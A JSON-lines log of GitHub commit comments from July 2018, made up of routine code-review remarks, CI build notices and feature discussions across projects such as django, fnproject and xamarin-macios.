{"id":"7920200297","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29599829,"position":null,"line":null,"path":null,"commit_id":"13ecb2adef6b4413a4c7f3114e12365122a00047","created_at":"2018-07-04T21:58:38Z","updated_at":"2018-07-04T21:58:38Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/63/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/63//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/13ecb2adef6b4413a4c7f3114e12365122a00047/63/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/13ecb2adef6b4413a4c7f3114e12365122a00047/63/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/13ecb2adef6b4413a4c7f3114e12365122a00047/63/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/13ecb2adef6b4413a4c7f3114e12365122a00047/63/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-04T21:58:38Z"}
{"id":"7920201182","type":"CommitCommentEvent","actor":{"login":"skeeto"},"repo":{"name":"skeeto/skeeto.github.com"},"payload":{"comment":{"id":29599832,"position":52,"line":52,"path":"_posts/2011-11-28-video-editing.markdown","commit_id":"85e691fbc519ee9f7c1e155e038f51c68c9038c1","created_at":"2018-07-04T21:59:05Z","updated_at":"2018-07-04T21:59:05Z","author_association":"OWNER","body":"Thanks for the tip. I've had a couple of people inform me about \nsuckless' farbfeld image format too. I like what they've done, and the \nonly real drawback is a catch-22 of sorts. Lots of tools these days \nunderstand the Netpbm and Y4M formats and can read them directly, but \nfew support farbfeld and blind. Wider support will happen when more \npeople are using these formats, but there's little reason to use these \nformats when they're not widely supported.\n\nStill, I'm glad they're laying the groundwork for these new formats so \nthat someday in the future they'll be well supported by lots more tools.\n"}},"created_at":"2018-07-04T21:59:05Z"}
{"id":"7920201983","type":"CommitCommentEvent","actor":{"login":"adr1ancho"},"repo":{"name":"hmcts/ccd-data-store-api"},"payload":{"comment":{"id":29599834,"position":19,"line":35,"path":"src/main/java/uk/gov/hmcts/ccd/domain/service/aggregated/AbstractAuthorisedCaseViewOperation.java","commit_id":"23ec85558950a0a9cfa1116177d900ab4fc9d9a1","created_at":"2018-07-04T21:59:29Z","updated_at":"2018-07-04T21:59:29Z","author_association":"MEMBER","body":"Looks like all these lines can be collapsed into one"}},"created_at":"2018-07-04T21:59:29Z"}
{"id":"7920204591","type":"CommitCommentEvent","actor":{"login":"adr1ancho"},"repo":{"name":"hmcts/ccd-data-store-api"},"payload":{"comment":{"id":29599845,"position":39,"line":82,"path":"src/main/java/uk/gov/hmcts/ccd/domain/service/aggregated/AbstractDefaultGetCaseViewOperation.java","commit_id":"23ec85558950a0a9cfa1116177d900ab4fc9d9a1","created_at":"2018-07-04T22:00:41Z","updated_at":"2018-07-04T22:00:41Z","author_association":"MEMBER","body":"Is this new line done by IDE?"}},"created_at":"2018-07-04T22:00:41Z"}
{"id":"7920206249","type":"CommitCommentEvent","actor":{"login":"getdls"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29599847,"position":null,"line":null,"path":null,"commit_id":"47359193d57725949b480e9adeb4e8f440105e9f","created_at":"2018-07-04T22:01:26Z","updated_at":"2018-07-04T22:01:26Z","author_association":"COLLABORATOR","body":"Crap.. forgot about regular res.. and proportions.. \r\nMaybe some php can fix this.."}},"created_at":"2018-07-04T22:01:26Z"}
{"id":"7920210313","type":"CommitCommentEvent","actor":{"login":"dashohoxha"},"repo":{"name":"EasyGnuPG/pgpg"},"payload":{"comment":{"id":29599857,"position":5,"line":17,"path":"src/gpg/contact/delete.py","commit_id":"40359e961342d0bab3a1baffbad954a456959ce6","created_at":"2018-07-04T22:03:44Z","updated_at":"2018-07-04T22:03:44Z","author_association":"MEMBER","body":"Also a keyring seems to be an unfamiliar term for the user. It could be better just \"Delete this contact?\" or \"Delete this contact from the list?\""}},"created_at":"2018-07-04T22:03:44Z"}
{"id":"7920210793","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29599858,"position":21,"line":21,"path":"contracts/Splitter.sol","commit_id":"835d707af380fd67fbead1b22cf6f2a04f0e624b","created_at":"2018-07-04T22:04:00Z","updated_at":"2018-07-04T22:04:00Z","author_association":"OWNER","body":"Hello Rob, thank you for your comment. I think I get what you are hinting at. We need to validate that the transfer execution has ended successfully.\r\nI have a question, though. In Unit 3 , I can \" It also forces a rollback of the whole transaction if the transfer failed.\", so I was under the impression that exceptions would be already taken care of when using .transfer. What I am missing?"}},"created_at":"2018-07-04T22:04:00Z"}
{"id":"7920214576","type":"CommitCommentEvent","actor":{"login":"GottfriedSp"},"repo":{"name":"CelestiaProject/Celestia"},"payload":{"comment":{"id":29599866,"position":null,"line":null,"path":null,"commit_id":"eaaf6d4634a3719b1f34f497504e43de009e7a78","created_at":"2018-07-04T22:06:08Z","updated_at":"2018-07-04T22:06:08Z","author_association":"NONE","body":"I have now added for each issue a new branch and create now the pull requests again.\r\n"}},"created_at":"2018-07-04T22:06:08Z"}
{"id":"7920215819","type":"CommitCommentEvent","actor":{"login":"MJZ1977"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29599872,"position":null,"line":null,"path":null,"commit_id":"17ee75c2c3c431bc7c6560ff1eac87dbceb62ef4","created_at":"2018-07-04T22:06:48Z","updated_at":"2018-07-04T22:06:48Z","author_association":"NONE","body":"Hello Stefano,\r\n\r\nPerhaps it will be a good idea to add a term with evaluation progress since last completed depth ?"}},"created_at":"2018-07-04T22:06:48Z"}
{"id":"7920219401","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29599879,"position":48,"line":48,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-04T22:08:52Z","updated_at":"2018-07-04T22:08:52Z","author_association":"CONTRIBUTOR","body":"This is not combined, simple"}},"created_at":"2018-07-04T22:08:52Z"}
{"id":"7920220983","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29599882,"position":80,"line":80,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-04T22:09:49Z","updated_at":"2018-07-04T22:09:49Z","author_association":"CONTRIBUTOR","body":"`return \"indexes of \" + list.toString(null, debug);`\r\n\r\n:("}},"created_at":"2018-07-04T22:09:49Z"}
{"id":"7920222494","type":"CommitCommentEvent","actor":{"login":"pope1ni"},"repo":{"name":"django/django"},"payload":{"comment":{"id":29599888,"position":43,"line":64,"path":"django/db/models/functions/math.py","commit_id":"f6f8614b8fabc8138c9bc9763841e18ba7bf55f7","created_at":"2018-07-04T22:10:42Z","updated_at":"2018-07-04T22:10:42Z","author_association":"CONTRIBUTOR","body":"I've re-read this and think it doesn't quite explain it right.\r\n\r\nIt works correctly when both arguments are integers, but not when both are floats/decimals as they need to be inverted.\r\n\r\nIf one of the arguments is an integer and the other is a float/decimal, one of the arguments passed to the underlying atan2 function inside the spatialite function will be overwritten and the other will be undefined.\r\n\r\nWe cannot cast float/decimal to integer for obvious reasons, so we need to cast integer to float and invert the arguments.\r\n\r\nPhew. Am sure you'll be able to explain that more succinctly..."}},"created_at":"2018-07-04T22:10:42Z"}
{"id":"7920223952","type":"CommitCommentEvent","actor":{"login":"fabjan"},"repo":{"name":"lopec/LoPEC"},"payload":{"comment":{"id":29599891,"position":null,"line":null,"path":null,"commit_id":"0ecb1a7aad04e54c4bc70ad2f6d9537703651244","created_at":"2018-07-04T22:11:32Z","updated_at":"2018-07-04T22:11:32Z","author_association":"COLLABORATOR","body":"👍 "}},"created_at":"2018-07-04T22:11:32Z"}
{"id":"7920224726","type":"CommitCommentEvent","actor":{"login":"nickl-"},"repo":{"name":"stefanofornari/BshConsole"},"payload":{"comment":{"id":29599892,"position":184,"line":184,"path":"src/main/java/bsh/BshConsoleInterpreter.java","commit_id":"0d2b1e9da18126ea1aa2df392e498fedd7acb66f","created_at":"2018-07-04T22:11:59Z","updated_at":"2018-07-04T22:11:59Z","author_association":"CONTRIBUTOR","body":"I have removed these (out of memory) hacks I think it is some legacy stuff as I could not find anywhere javacc suggests we should be doing this."}},"created_at":"2018-07-04T22:11:59Z"}
{"id":"7920226224","type":"CommitCommentEvent","actor":{"login":"nbosco"},"repo":{"name":"nbosco/cpython"},"payload":{"comment":{"id":29599894,"position":null,"line":null,"path":null,"commit_id":"9d5ec808de2c1359f434cc2fa8378458e4339c96","created_at":"2018-07-04T22:12:41Z","updated_at":"2018-07-04T22:12:41Z","author_association":"OWNER","body":"I see, thanks!"}},"created_at":"2018-07-04T22:12:41Z"}
{"id":"7920227898","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29599900,"position":49,"line":49,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-04T22:13:31Z","updated_at":"2018-07-04T22:13:31Z","author_association":"CONTRIBUTOR","body":"[(all [[of] the]|the)]\r\n\r\nAll the expressions should use this or none should use? So not mixed.."}},"created_at":"2018-07-04T22:13:31Z"}
{"id":"7920228222","type":"CommitCommentEvent","actor":{"login":"pope1ni"},"repo":{"name":"django/django"},"payload":{"comment":{"id":29599901,"position":59,"line":126,"path":"django/db/models/functions/math.py","commit_id":"f6f8614b8fabc8138c9bc9763841e18ba7bf55f7","created_at":"2018-07-04T22:13:41Z","updated_at":"2018-07-04T22:13:41Z","author_association":"CONTRIBUTOR","body":"Is it worth adding a link as for `ATan2`?\r\n\r\nhttps://www.gaia-gis.it/fossil/libspatialite/tktview?name=8f59ddebf0"}},"created_at":"2018-07-04T22:13:41Z"}
{"id":"7920229688","type":"CommitCommentEvent","actor":{"login":"nickl-"},"repo":{"name":"stefanofornari/BshConsole"},"payload":{"comment":{"id":29599904,"position":166,"line":166,"path":"src/main/java/bsh/BshConsoleInterpreter.java","commit_id":"0d2b1e9da18126ea1aa2df392e498fedd7acb66f","created_at":"2018-07-04T22:14:26Z","updated_at":"2018-07-04T22:14:26Z","author_association":"CONTRIBUTOR","body":"All removed this... the java docs state we should not be yielding and the with or without the flushing the results appear the same so I figure this is again some java 1.1 1.2 legacy stuff."}},"created_at":"2018-07-04T22:14:26Z"}
{"id":"7920230132","type":"CommitCommentEvent","actor":{"login":"Mianovag"},"repo":{"name":"nnmware/devoops"},"payload":{"comment":{"id":29599905,"position":null,"line":null,"path":null,"commit_id":"727a5d0b0b98bb45b7497b31cf6582afaf7d948f","created_at":"2018-07-04T22:14:39Z","updated_at":"2018-07-04T22:14:39Z","author_association":"NONE","body":"is there any chance to update it to boostrat 4?"}},"created_at":"2018-07-04T22:14:39Z"}
{"id":"7920232562","type":"CommitCommentEvent","actor":{"login":"rikgibson"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29599913,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:15:59Z","updated_at":"2018-07-04T22:15:59Z","author_association":"CONTRIBUTOR","body":"We (well @JadeRedworth) added a \"content_type\" to func.yaml a little while back - see [CLI #248](https://github.com/fnproject/cli/issues/248)"}},"created_at":"2018-07-04T22:15:59Z"}
{"id":"7920234540","type":"CommitCommentEvent","actor":{"login":"nnmware"},"repo":{"name":"nnmware/devoops"},"payload":{"comment":{"id":29599918,"position":null,"line":null,"path":null,"commit_id":"727a5d0b0b98bb45b7497b31cf6582afaf7d948f","created_at":"2018-07-04T22:17:05Z","updated_at":"2018-07-04T22:17:05Z","author_association":"OWNER","body":"No. Sorry, no time\n\n> 5 июля 2018 г., в 1:14, Angel <notifications@github.com> написал(а):\n> \n> is there any chance to update it to boostrat 4?\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub <https://github.com/nnmware/devoops/commit/727a5d0b0b98bb45b7497b31cf6582afaf7d948f#commitcomment-29599905>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ABgyB6MijMMSSyWIvNrx6iY1t8Furnfwks5uDT5QgaJpZM4VDDnB>.\n> \n\n"}},"created_at":"2018-07-04T22:17:05Z"}
{"id":"7920235060","type":"CommitCommentEvent","actor":{"login":"zootalures"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29599921,"position":11,"line":8,"path":"docs/developers/fn-file.md","commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:17:24Z","updated_at":"2018-07-04T22:17:24Z","author_association":"MEMBER","body":"Would be great if we could not do this"}},"created_at":"2018-07-04T22:17:24Z"}
{"id":"7920235237","type":"CommitCommentEvent","actor":{"login":"rikgibson"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29599922,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:17:30Z","updated_at":"2018-07-04T22:17:30Z","author_association":"CONTRIBUTOR","body":"I would seriously like to change all of the \"_\" to \"-\" - looks and reads so much better."}},"created_at":"2018-07-04T22:17:30Z"}
{"id":"7920235500","type":"CommitCommentEvent","actor":{"login":"edm00se"},"repo":{"name":"edm00se/blog"},"payload":{"comment":{"id":29599924,"position":null,"line":null,"path":null,"commit_id":"810b41e699506592d2b0338f67489024f1af092e","created_at":"2018-07-04T22:17:39Z","updated_at":"2018-07-04T22:17:39Z","author_association":"OWNER","body":"*for tag headers\r\n\r\nGood ol’ web editing from a smart phone."}},"created_at":"2018-07-04T22:17:39Z"}
{"id":"7920235593","type":"CommitCommentEvent","actor":{"login":"zootalures"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29599925,"position":11,"line":8,"path":"docs/developers/fn-file.md","commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:17:42Z","updated_at":"2018-07-04T22:17:42Z","author_association":"MEMBER","body":"We are heading toward (from a user perspective) v1"}},"created_at":"2018-07-04T22:17:42Z"}
{"id":"7920236152","type":"CommitCommentEvent","actor":{"login":"zootalures"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29599927,"position":39,"line":31,"path":"docs/developers/fn-file.md","commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:18:05Z","updated_at":"2018-07-04T22:18:05Z","author_association":"MEMBER","body":"Can name be the key here? "}},"created_at":"2018-07-04T22:18:05Z"}
{"id":"7920237373","type":"CommitCommentEvent","actor":{"login":"zootalures"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29599932,"position":1,"line":1,"path":"docs/developers/triggers.md","commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:18:48Z","updated_at":"2018-07-04T22:18:48Z","author_association":"MEMBER","body":"Vars here is obtuse"}},"created_at":"2018-07-04T22:18:48Z"}
{"id":"7920238102","type":"CommitCommentEvent","actor":{"login":"csierra"},"repo":{"name":"apache/aries-jax-rs-whiteboard"},"payload":{"comment":{"id":29599933,"position":null,"line":null,"path":null,"commit_id":"a6ba7b98778c639e654266ddbb276f5981b1bea8","created_at":"2018-07-04T22:19:13Z","updated_at":"2018-07-04T22:19:13Z","author_association":"CONTRIBUTOR","body":"hey @tonit, \r\nI don't know what's the change that made it fail for you, sorry. The problem is we did not want to expose directly CXF internals by exporting its packages by default. Many extensions use the JAX-RS api and don't need to exchange CXF classes, alas that's not the case with jaxb-json jettison support. So I guess it boils down to either export the needed packages from the core (IIRC it is in cxf-core that comes in the whiteboard) or duplicating it. It is the same if you need to install CXF providers or extensions, you need to expose those packages by using a fragment to the whiteboard. \r\n\r\nWould this work for you?\r\n"}},"created_at":"2018-07-04T22:19:13Z"}
{"id":"7920239180","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29599936,"position":null,"line":null,"path":null,"commit_id":"02016a946b05c26a81833f7f2a0fe9128ccfd63f","created_at":"2018-07-04T22:19:50Z","updated_at":"2018-07-04T22:19:50Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-697](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-697).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-697-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-04T22:19:50Z"}
{"id":"7920240860","type":"CommitCommentEvent","actor":{"login":"DooblyNoobly"},"repo":{"name":"unitystation/unitystation"},"payload":{"comment":{"id":29599948,"position":null,"line":null,"path":null,"commit_id":"5d089cf52956f07b9b0231f03db2bc03cfda46b3","created_at":"2018-07-04T22:20:46Z","updated_at":"2018-07-04T22:20:46Z","author_association":"MEMBER","body":"Seems to fix #1109 "}},"created_at":"2018-07-04T22:20:46Z"}
{"id":"7920240922","type":"CommitCommentEvent","actor":{"login":"gbenadikar"},"repo":{"name":"hmcts/ccd-data-store-api"},"payload":{"comment":{"id":29599949,"position":39,"line":82,"path":"src/main/java/uk/gov/hmcts/ccd/domain/service/aggregated/AbstractDefaultGetCaseViewOperation.java","commit_id":"23ec85558950a0a9cfa1116177d900ab4fc9d9a1","created_at":"2018-07-04T22:20:47Z","updated_at":"2018-07-04T22:20:47Z","author_association":"NONE","body":"Yes, as checkstyle warning is set to 120 characters. My IDE is set to 120 characters too. Is it not 120?"}},"created_at":"2018-07-04T22:20:47Z"}
{"id":"7920242421","type":"CommitCommentEvent","actor":{"login":"gbenadikar"},"repo":{"name":"hmcts/ccd-data-store-api"},"payload":{"comment":{"id":29599951,"position":19,"line":35,"path":"src/main/java/uk/gov/hmcts/ccd/domain/service/aggregated/AbstractAuthorisedCaseViewOperation.java","commit_id":"23ec85558950a0a9cfa1116177d900ab4fc9d9a1","created_at":"2018-07-04T22:21:40Z","updated_at":"2018-07-04T22:21:40Z","author_association":"NONE","body":"whats the maximum number characters allowed on a line?"}},"created_at":"2018-07-04T22:21:40Z"}
{"id":"7920243022","type":"CommitCommentEvent","actor":{"login":"zootalures"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29599952,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:22:03Z","updated_at":"2018-07-04T22:22:03Z","author_association":"MEMBER","body":"I'm seriously anti \"-\" - YAML feels like something closer to programming to me  - in both cases camel case and underscores are acceptable but \"-\" is not. \r\n\r\n"}},"created_at":"2018-07-04T22:22:03Z"}
{"id":"7920243215","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29599953,"position":48,"line":48,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-04T22:22:10Z","updated_at":"2018-07-04T22:22:10Z","author_association":"MEMBER","body":"it is combined as it can contain other expressions. a sinple expression is one that does not contain other expressions, for example `new line`"}},"created_at":"2018-07-04T22:22:10Z"}
{"id":"7920254022","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29599995,"position":null,"line":null,"path":null,"commit_id":"2cacaa798ca393652c1a7574994a9051e54da3a7","created_at":"2018-07-04T22:28:49Z","updated_at":"2018-07-04T22:28:49Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-698](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-698).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-698-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-04T22:28:49Z"}
{"id":"7920254638","type":"CommitCommentEvent","actor":{"login":"kordianbruck"},"repo":{"name":"TCA-Team/TumCampusApp"},"payload":{"comment":{"id":29599998,"position":5,"line":70,"path":"app/src/main/java/de/tum/in/tumcampusapp/database/TcaDb.java","commit_id":"c77ca823e31539025d13220bbc72ce78c2403d91","created_at":"2018-07-04T22:29:12Z","updated_at":"2018-07-04T22:29:12Z","author_association":"CONTRIBUTOR","body":"Pssst"}},"created_at":"2018-07-04T22:29:12Z"}
{"id":"7920255198","type":"CommitCommentEvent","actor":{"login":"zootalures"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29600000,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:29:35Z","updated_at":"2018-07-04T22:29:35Z","author_association":"MEMBER","body":"fwiw these are the initial func.yamls that we generate : \r\n```\r\n#---------- RUNTIME go\r\nname: go\r\nversion: 0.0.1\r\nruntime: go\r\nentrypoint: ./func\r\nformat: json\r\n#---------- RUNTIME java\r\nname: java\r\nversion: 0.0.1\r\nruntime: java\r\ncmd: com.example.fn.HelloFunction::handleRequest\r\nbuild_image: fnproject/fn-java-fdk-build:jdk9-1.0.63\r\nrun_image: fnproject/fn-java-fdk:jdk9-1.0.63\r\nformat: http\r\n#---------- RUNTIME node\r\nname: node\r\nversion: 0.0.1\r\nruntime: node\r\nentrypoint: node func.js\r\nformat: json\r\n#---------- RUNTIME python\r\nname: python\r\nversion: 0.0.1\r\nruntime: python\r\nentrypoint: python3 func.py\r\nformat: json\r\n#---------- RUNTIME ruby\r\nname: ruby\r\nversion: 0.0.1\r\nruntime: ruby\r\nentrypoint: ruby func.rb\r\nformat: json\r\n```"}},"created_at":"2018-07-04T22:29:35Z"}
{"id":"7920255628","type":"CommitCommentEvent","actor":{"login":"kobake"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29600002,"position":28,"line":28,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-04T22:29:53Z","updated_at":"2018-07-04T22:29:53Z","author_association":"MEMBER","body":"このヘッダを用いる人が、あえて windows.h をインクルードせずに別のヘッダをインクルードする用途があるのであれば、そのような対応には意味があると思います。\r\n\r\nそのような用途を想定されているのですか？\r\n\r\nこのプロダクトに含まれているソースコード一式は、あくまでもアプリケーション層のものであり、SDK層のものではないことも意識した上で検討をいただきたいです。"}},"created_at":"2018-07-04T22:29:53Z"}
{"id":"7920256599","type":"CommitCommentEvent","actor":{"login":"slashiee"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29600009,"position":null,"line":null,"path":null,"commit_id":"c8a057b5641318eab8124eedebe6ed43e8cd4a1b","created_at":"2018-07-04T22:30:26Z","updated_at":"2018-07-04T22:30:26Z","author_association":"OWNER","body":"to make it the same resolution as we're upscaling the game to?"}},"created_at":"2018-07-04T22:30:26Z"}
{"id":"7920260231","type":"CommitCommentEvent","actor":{"login":"calebsander"},"repo":{"name":"ASCIT/donut"},"payload":{"comment":{"id":29600022,"position":5,"line":44,"path":"donut/modules/flights/helpers.py","commit_id":"d304f81530c60a151a6351c5ebdd0e695bb5e3f4","created_at":"2018-07-04T22:32:39Z","updated_at":"2018-07-04T22:32:39Z","author_association":"MEMBER","body":"I don't think you need two references to the same list; you can have multiple open iterators over the same list"}},"created_at":"2018-07-04T22:32:39Z"}
{"id":"7920264233","type":"CommitCommentEvent","actor":{"login":"calebsander"},"repo":{"name":"ASCIT/donut"},"payload":{"comment":{"id":29600025,"position":20,"line":54,"path":"donut/modules/flights/helpers.py","commit_id":"d304f81530c60a151a6351c5ebdd0e695bb5e3f4","created_at":"2018-07-04T22:35:11Z","updated_at":"2018-07-04T22:35:11Z","author_association":"MEMBER","body":"Slightly faster to use `.append()` instead of constructing a singleton list and extending the list with it"}},"created_at":"2018-07-04T22:35:11Z"}
{"id":"7920264761","type":"CommitCommentEvent","actor":{"login":"wopian"},"repo":{"name":"Favna/Ribbon"},"payload":{"comment":{"id":29600026,"position":null,"line":null,"path":null,"commit_id":"8e1dd0c3b6fede9459273454fe16a1d2ac4e7e12","created_at":"2018-07-04T22:35:29Z","updated_at":"2018-07-04T22:35:29Z","author_association":"NONE","body":"This will still break for non-Japanese media (i.e Chinese or Korean). Better to do:\r\n\r\n```js\r\nsetTitle(hit.titles.en ? hit.titles.en : hit.canonicalTitle)\r\n```"}},"created_at":"2018-07-04T22:35:29Z"}
{"id":"7920265658","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29600028,"position":null,"line":null,"path":null,"commit_id":"0082f82164e983d4356b11f2e7dfc7a093b5946a","created_at":"2018-07-04T22:36:04Z","updated_at":"2018-07-04T22:36:04Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-700](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-700).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-700-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-04T22:36:04Z"}
{"id":"7920266049","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29600031,"position":null,"line":null,"path":null,"commit_id":"a32a8d3a45d2943b0a7beb7596c23224c77d40fd","created_at":"2018-07-04T22:36:18Z","updated_at":"2018-07-04T22:36:18Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-703](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-703).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-703-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-04T22:36:18Z"}
{"id":"7920266151","type":"CommitCommentEvent","actor":{"login":"csierra"},"repo":{"name":"apache/aries-jax-rs-whiteboard"},"payload":{"comment":{"id":29600032,"position":null,"line":null,"path":null,"commit_id":"a6ba7b98778c639e654266ddbb276f5981b1bea8","created_at":"2018-07-04T22:36:22Z","updated_at":"2018-07-04T22:36:22Z","author_association":"CONTRIBUTOR","body":"ah, I see... \r\nthose were still not releasable because of the state of the APIs they depend on. We hacked our way to make it work in the snapshot, but we could not release them that way. Once the APIs are sorted out they will be released.\r\n\r\nSorry I might have missed your message on the list. I will try to track it down and answer there as well. "}},"created_at":"2018-07-04T22:36:22Z"}
{"id":"7920266321","type":"CommitCommentEvent","actor":{"login":"rikgibson"},"repo":{"name":"fnproject/fn"},"payload":{"comment":{"id":29600033,"position":null,"line":null,"path":null,"commit_id":"e6260bc591126e1d4649a142ec3887c428a39bac","created_at":"2018-07-04T22:36:27Z","updated_at":"2018-07-04T22:36:27Z","author_association":"CONTRIBUTOR","body":"I think it's a little odd not having the trigger type & source not nested under the name - might look flat and unclear if you have two triggers."}},"created_at":"2018-07-04T22:36:27Z"}
{"id":"7920270272","type":"CommitCommentEvent","actor":{"login":"obeyler"},"repo":{"name":"kubernetes/charts"},"payload":{"comment":{"id":29600036,"position":null,"line":null,"path":null,"commit_id":"98f93989e3e283e7caaac7618eb2e576f74c9a45","created_at":"2018-07-04T22:39:01Z","updated_at":"2018-07-04T22:39:01Z","author_association":"NONE","body":"Why do you add securityContext with this constant value \"472\" ?\r\nWhen you do that rbac.pspEnabled= false doesn't work fine"}},"created_at":"2018-07-04T22:39:01Z"}
{"id":"7920270729","type":"CommitCommentEvent","actor":{"login":"TheRealPear"},"repo":{"name":"Cerium3/Modpack"},"payload":{"comment":{"id":29600037,"position":null,"line":null,"path":null,"commit_id":"02b89aca9e9409bb76bc33c2c001f797b8248da5","created_at":"2018-07-04T22:39:18Z","updated_at":"2018-07-04T22:39:18Z","author_association":"COLLABORATOR","body":"yay"}},"created_at":"2018-07-04T22:39:18Z"}
{"id":"7920274291","type":"CommitCommentEvent","actor":{"login":"hoodie"},"repo":{"name":"h4llow3En/mac-notification-sys"},"payload":{"comment":{"id":29600040,"position":10,"line":21,"path":"Cargo.toml","commit_id":"13b7fddc82672515cdc40dc920a12f7c0a6bd8d4","created_at":"2018-07-04T22:41:37Z","updated_at":"2018-07-04T22:41:37Z","author_association":"COLLABORATOR","body":"you can toss the error-chain dep now"}},"created_at":"2018-07-04T22:41:37Z"}
{"id":"7920275637","type":"CommitCommentEvent","actor":{"login":"getdls"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29600044,"position":null,"line":null,"path":null,"commit_id":"c8a057b5641318eab8124eedebe6ed43e8cd4a1b","created_at":"2018-07-04T22:42:29Z","updated_at":"2018-07-04T22:42:29Z","author_association":"COLLABORATOR","body":"Sweet, it works. \r\nGamepad aspect is correct on both ultra wide and normal.  Strange that it didn't work when scaling to TV. \r\n \r\n![tmsaspok](https://user-images.githubusercontent.com/25286924/42295579-217c2c44-7fec-11e8-95fc-816084c64849.png)\r\n"}},"created_at":"2018-07-04T22:42:29Z"}
